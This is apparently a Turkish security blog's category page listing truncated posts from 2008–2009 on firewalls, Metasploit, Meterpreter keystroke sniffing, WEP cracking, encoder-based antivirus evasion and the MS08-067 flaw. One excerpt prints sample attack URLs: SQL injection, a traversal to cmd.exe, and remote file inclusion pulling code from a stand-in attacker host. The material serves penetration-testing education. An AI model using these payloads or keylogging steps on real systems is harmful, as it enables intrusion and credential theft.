Category: Görsel Anlatımlar

Firewall / Görsel Anlatımlar / Windows Server

19 Apr, 2009

ISA SERVER 2006 ENTERPRISE KURULUMU

ISA Server 2006,  Microsoft güvenlik çözümleri arasında yaygın kullanılan yazılımsal bir firewall uygulamasıdır. Sistem ve Network ü iç ve dış tehditlere karşı korurken aynı zamanda kullanıcıların uygulama ve verilere hızlı, güvenli bir şekilde erişmelerine olanak sağlayan entegre uç güvenliği ağ geçididir. ISA Server 2006’nın iki sürümü bulunur: Standard sürüm ve Enterprise sürüm.İki sürüm arasındaki farklılıkları buraya tıklayarak öğrenebilirsiniz. Kullanım Senaryoları...

Görsel Anlatımlar / Püf Noktalar

26 Mar, 2009

Meterpreter ile Klavye Girişlerini Yakalamak (Keystroke Sniffing)

Kısa süre önce meterpreter payloadına yeni kodlar eklendi.Yeni özellikler kazandırılan meterpreter payloadı ile klavye girişlerini yakalamak (sniff etmek) mümkün. “migrate” komutu ile istenilen uygulamaya enjekte olunarak “keyscan_start” ve “keyscan_dump” komutları ile klavye girişleri yakalanabiliniyor. Örnek bir kullanım için, Windows XP SP3 sisteme Ms08-067 exploiti ile meterpreter payloadını karşıya yükleyip komut satırını aldığımızı varsayalım. Oturum Açma Bilgilerini Yakalama Oturum elde edildikden...

Görsel Anlatımlar / Pentest / Pentest Tools

19 Feb, 2009

Fast-Track 4.0 – Otomatik Penetrasyon Test Paketi

Fast-Track 4.0 python programlama dili ile yazılmış açık kaynak kodlu bir proje.Penetrasyon test yapan güvenlik uzmanları için oldukça el verişli, gelişmiş açıklıkları istismar eden ve farklı ağlara nüfuz etmek için kullanılan bir araç. SecureState tarafından yazılıp geliştirilen araç MilwOrm ve Metasploit Framework exploit ve payloadlarını, veritabanı olarak Sqlite3 kullanıyor. Aşağıdaki Videodalarda örnek Fast-Track saldırıları Bulunuyor. Fast-Track Autopwnage Fast-Track SQLPwnage

Görsel Anlatımlar / Wireless

11 Jan, 2009

Kablosuz Ağları Kırmak ve Kablosuz Ağ Güvenliği – WEP Crack

Wireless Hacking Wireless network teknolojisi gittikçe popülerleşmekte fakat aynı zamanda güvenlik açıkları ortaya çıkmaktadır.Wireless teknolojisi iki özelliğiyle popülerleşmektedir, rahat olması ve ücretler ile. Kablosuz lan teknolojisi çalışanların dijital kaynaklara masalarına bağlı kalmadan ulaşmalarını sağlamaktadır. Laptoplar toplantılara götürülebilir , yada cafelerden wireless networklere dahil olabilir. İş ve wireless saldırıları Firmalar wireless networklere talep gösterdikçe wireles networklerin güvenlikleri derinleşmiştir. İşler fiziksel girişe...

Görsel Anlatımlar / Pentest Tools / Püf Noktalar

13 Dec, 2008

Msfpayload ve payloadgen.py ile Payload Derlemek

Terimler Exploit: Bir sistemin yada programin güvenlik açigini kullanarak yetkisiz bir islem yapilmasini saglayan yöntem. Payload: Exploit sonrasi çalisip yetkisiz islevi gerçeklestirecek içerik. Encoder: Çalışacak olan Shellcode’u değiştiren ve IDS/IPS ler ve antivirüsler tarafından yakalanmasını önleyen yazılımlar. Hackerlar bir hedefe yönelik saldırı düzenlerken sistemi ele geçirmek yada amaca göre sadece önemli bilgiyi elde etmeyi hedeflerler.Bilgisayar tabanlı güvenlik açıklıkları exploit edilip...

Görsel Anlatımlar / Güvenlik Duyuruları / Windows Server

8 Dec, 2008

MS Windows Server Service Code Execution (MS08-067)

23 Ekim 2008 Perşembe günü Microsoft bir yama yayınladı.Bu yamanın kapattığı açıklık bütün Windows türlerini tehdit etdiyor. Özellikle de Windows 2000/SP4, Windows XP/SP2/SP3 ve Windows 2003/SP1/SP2 işletim sistemlerinde uzaktan kod çalıştırılmasına izin vermekte , Windows Vista ve Windows 2008 Server işletim sistemlerinde ise servis dışı bırakma saldırılarına olanak sağlamaktadır. Microsoft Güvenlik Bülteni: http://www.microsoft.com/technet/security/Bulletin/MS08-067.mspx Exploit Kodları: http://www.milw0rm.com/exploits/7104 Örnek Bir Saldırı ; Tam...

Firewall / Görsel Anlatımlar

20 Aug, 2008

Endian Firewall

Endian Firewall oldukça gelişmiş içerik filtreleme , anti spam , firewall , OpenVPN ve IDS gibi bir çok özelliği olan gelişmiş bir güvenlik duvarı. Aşağıdaki adreste hazırlamış olduğum , Endian Firewall’u en temel şekli ile kurulumunu yapabileceğiniz , denemeleriniz ve testleriniz için hazır hale getirebileceğiniz temel yapılandırmaların anlatıldığı  size rehberlik edecek bir makale ve kurulum videosu yer almakda. Endian makelesine  ...

Firewall / Görsel Anlatımlar / pfSense

13 Aug, 2008

PFSense Firewall

PfSense, FreeBSD tabanlı bir dağıtım olarak, BSD sağlamlığını taşıyan, son zamanlarda adından sıkça söz ettiren oldukça gelişmiş ve yetenekli bir güvenlik duvarı dağıtımıdır. BSD lisansı ile dağıtılmaktadır. Pfsense’in kurulu ve temel ayarlamalarını anlatan güzel bir makale http://cehturkiye.com/pfsense/pfsense.pdf adresinde yer almakda. Pfsense ile İçerik filtreleme  , VPN ayarlamaları , Firewall gibi gibi özellikler konusunda geniş makaleler ve videolar hazırladıkça forum bölümümüzde...

Ethical Hacker / Görsel Anlatımlar

29 May, 2008

Metasploit ile Güvenlik Denetimi

Metasploit ile Güvenlik Denetimi Terimler: Exploit : Bir sistemin yada programin güvenlik açigini kullanarak yetkisiz bir islem yapilmasini saglayan yöntem. http://sunucu/script/login.asp?uid=’ OR 1=1– http://sunucu/script/..%c0%af../winnt/system32/cmd.exe?/c+dir http://sunucu/script/index.php?dizin=http://saldırgan.com/kotukod.txt? Payload : Exploit sonrasi çalisip yetkisiz islevi gerçeklestirecek içerik. Shellcode:Exploit sonrasi çalisicak olan sisteme özel kodlar. Nop : “Not Operation” , bellek yeri öğrenme amaçlı bellek dolduran bitler.. Encoder : Çalışacak olan Shellcode’u değiştiren ve...

CEH Türkiye Hosting Sponsoru